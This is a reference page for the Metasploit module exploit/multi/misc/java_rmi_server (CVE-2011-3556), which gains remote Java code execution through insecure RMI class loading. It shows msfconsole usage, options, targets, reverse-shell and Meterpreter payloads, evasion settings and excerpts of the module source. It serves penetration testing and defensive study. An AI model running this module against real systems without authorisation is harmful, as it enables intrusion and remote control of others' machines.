Java RMI Server Insecure Default Configuration Java Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/java_rmi_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Java RMI Server Insecure Default Configuration Java Code Execution
Module: exploit/multi/misc/java_rmi_server
Source code: modules/exploits/multi/misc/java_rmi_server.rb
Disclosure date: 2011-10-15
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Java, Linux, OSX, Solaris, Windows
Target service / protocol: java-rmi, rmi, rmid, rmiregistry
Target network port(s): 999, 1030, 1035, 1090, 1098, 1099, 1100, 1101, 1102, 1103, 1129, 1199, 1234, 1440, 2199, 2809, 3273, 3333, 3900, 5520, 5521, 5580, 5999, 6060, 6789, 6996, 7700, 7800, 7801, 7878, 7890, 8050, 8051, 8085, 8091, 8205, 8303, 8642, 8686, 8701, 8888, 8889, 8890, 8901, 8902, 8903, 8999, 9001, 9003, 9004, 9005, 9050, 9090, 9099, 9300, 9500, 9711, 9809, 9810, 9811, 9812, 9813, 9814, 9815, 9875, 9910, 9991, 9999, 10001, 10098, 10099, 10162, 11001, 11099, 11333, 12000, 13013, 14000, 15000, 15001, 15200, 16000, 17200, 18980, 20000, 23791, 26256, 31099, 32913, 33000, 37718, 45230, 47001, 47002, 50050, 50500, 50501, 50502, 50503, 50504
List of CVEs: CVE-2011-3556

This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • CheckModule: Module to check with

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/java_rmi_server exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/java_rmi_server

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show info

       Name: Java RMI Server Insecure Default Configuration Java Code Execution
     Module: exploit/multi/misc/java_rmi_server
   Platform: Java, Linux, OSX, Solaris, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-10-15

Provided by:
  mihi

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Linux x86 (Native Payload)
  3   Mac OS X PPC (Native Payload)
  4   Mac OS X x86 (Native Payload)

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      1099             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:
  Avoid: 0 characters

Description:
  This module takes advantage of the default configuration of the RMI 
  Registry and RMI Activation services, which allow loading classes 
  from any remote (HTTP) URL. As it invokes a method in the RMI 
  Distributed Garbage Collector which is available via every RMI 
  endpoint, it can be used against both rmiregistry and rmid, and 
  against most other (custom) RMI endpoints as well. Note that it does 
  not work against Java Management Extension (JMX) ports since those 
  do not support remote class loading, unless another RMI endpoint is 
  active in the same Java process. RMI method calls do not support or 
  require any sort of authentication.

References:
  http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
  http://www.securitytracker.com/id?1026215
  https://nvd.nist.gov/vuln/detail/CVE-2011-3556

Module Options


This is a complete list of options available in the multi/misc/java_rmi_server exploit:

msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/java_rmi_server exploit:

msf6 exploit(multi/misc/java_rmi_server) > show advanced

Module advanced options (exploit/multi/misc/java_rmi_server):

   Name                    Current Setting                         Required  Description
   ----                    ---------------                         --------  -----------
   CHOST                                                           no        The local client address
   CPORT                                                           no        The local client port
   CheckModule             auxiliary/scanner/misc/java_rmi_server  yes       Module to check with
   ConnectTimeout          10                                      yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                          no        The information file that contains context information
   DisablePayloadHandler   false                                   no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                   no        Use transient context when encoding payloads
   ListenerComm                                                    no        The specific communication channel to use for this service
   Proxies                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RmiReadLoopTimeout      1                                       yes       Maximum number of seconds to wait for data between read iterations
   SSLCipher                                                       no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                   no        Enable SSL/TLS-level compression
   SSLVerifyMode           PEER                                    no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto                                    yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                   no        Return a robots.txt file if asked for one
   URIHOST                                                         no        Host to use in URI (useful for tunnels)
   URIPORT                                                         no        Port to use in URI (useful for tunnels)
   VERBOSE                 false                                   no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module
   WfsDelay                10                                      no        Additional delay in seconds to wait for a session

Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        2                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/java_rmi_server module can exploit:

msf6 exploit(multi/misc/java_rmi_server) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Generic (Java Payload)
   1   Windows x86 (Native Payload)
   2   Linux x86 (Native Payload)
   3   Mac OS X PPC (Native Payload)
   4   Mac OS X x86 (Native Payload)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/java_rmi_server exploit:

msf6 exploit(multi/misc/java_rmi_server) > show payloads

Compatible Payloads
===================

   #   Name                                     Disclosure Date  Rank    Check  Description
   -   ----                                     ---------------  ----    -----  -----------
   0   payload/generic/custom                                    normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline
   4   payload/java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline
   5   payload/java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager
   6   payload/java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager
   7   payload/java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager
   8   payload/java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager
   9   payload/java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager
   10  payload/java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager
   11  payload/java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline
   12  payload/multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   13  payload/multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/java_rmi_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/java_rmi_server) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request


Here is a relevant code snippet related to the "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request" error message:

91:	    begin
92:	      Timeout.timeout(datastore['HTTPDELAY']) { super }
93:	    rescue Timeout::Error
94:	      # When the server stops due to our timeout, re-raise
95:	      # RuntimeError so it won't wait the full wfs_delay
96:	      raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
97:	    rescue Msf::Exploit::Failed
98:	      # When the server stops due primer failing,  re-raise
99:	      # RuntimeError so it won't wait the full wfs_delays
100:	      raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
101:	    rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e

Exploit aborted due to failure <FAIL_REASON> <VALUE>


Here is a relevant code snippet related to the "Exploit aborted due to failure <FAIL_REASON> <VALUE>" error message:

95:	      # RuntimeError so it won't wait the full wfs_delay
96:	      raise ::RuntimeError, "Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request"
97:	    rescue Msf::Exploit::Failed
98:	      # When the server stops due primer failing,  re-raise
99:	      # RuntimeError so it won't wait the full wfs_delays
100:	      raise ::RuntimeError, "Exploit aborted due to failure #{fail_reason} #{(fail_detail || "No reason given")}"
101:	    rescue Rex::ConnectionTimeout, Rex::ConnectionRefused => e
102:	      # When the primer fails due to an error connecting with
103:	      # the rhost,  re-raise RuntimeError so it won't wait the
104:	      # full wfs_delays
105:	      raise ::RuntimeError, e.message

<PEER> - Failed to negotiate RMI protocol


Here is a relevant code snippet related to the "<PEER> - Failed to negotiate RMI protocol" error message:

111:	
112:	    print_status("Sending RMI Header...")
113:	    send_header
114:	    ack = recv_protocol_ack
115:	    if ack.nil?
116:	      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
117:	    end
118:	
119:	    jar = rand_text_alpha(rand(8)+1) + '.jar'
120:	    new_url = get_uri + '/' + jar
121:	

RMI Call failed


Here is a relevant code snippet related to the "RMI Call failed" error message:

149:	    )
150:	
151:	    return_value = recv_return
152:	
153:	    if return_value.nil? && !session_created?
154:	      fail_with(Failure::Unknown,  'RMI Call failed')
155:	    end
156:	
157:	    if return_value && return_value.is_exception? && loader_disabled?(return_value)
158:	      fail_with(Failure::NotVulnerable,  'The RMI class loader is disabled')
159:	    end

The RMI class loader is disabled


Here is a relevant code snippet related to the "The RMI class loader is disabled" error message:

153:	    if return_value.nil? && !session_created?
154:	      fail_with(Failure::Unknown,  'RMI Call failed')
155:	    end
156:	
157:	    if return_value && return_value.is_exception? && loader_disabled?(return_value)
158:	      fail_with(Failure::NotVulnerable,  'The RMI class loader is disabled')
159:	    end
160:	
161:	    if return_value && return_value.is_exception? && class_not_found?(return_value)
162:	      fail_with(Failure::Unknown,  'The RMI class loader couldn\'t find the payload')
163:	    end

The RMI class loader couldn't find the payload


Here is a relevant code snippet related to the "The RMI class loader couldn't find the payload" error message:

157:	    if return_value && return_value.is_exception? && loader_disabled?(return_value)
158:	      fail_with(Failure::NotVulnerable,  'The RMI class loader is disabled')
159:	    end
160:	
161:	    if return_value && return_value.is_exception? && class_not_found?(return_value)
162:	      fail_with(Failure::Unknown,  'The RMI class loader couldn\'t find the payload')
163:	    end
164:	
165:	    disconnect
166:	  end
167:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • mihi

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.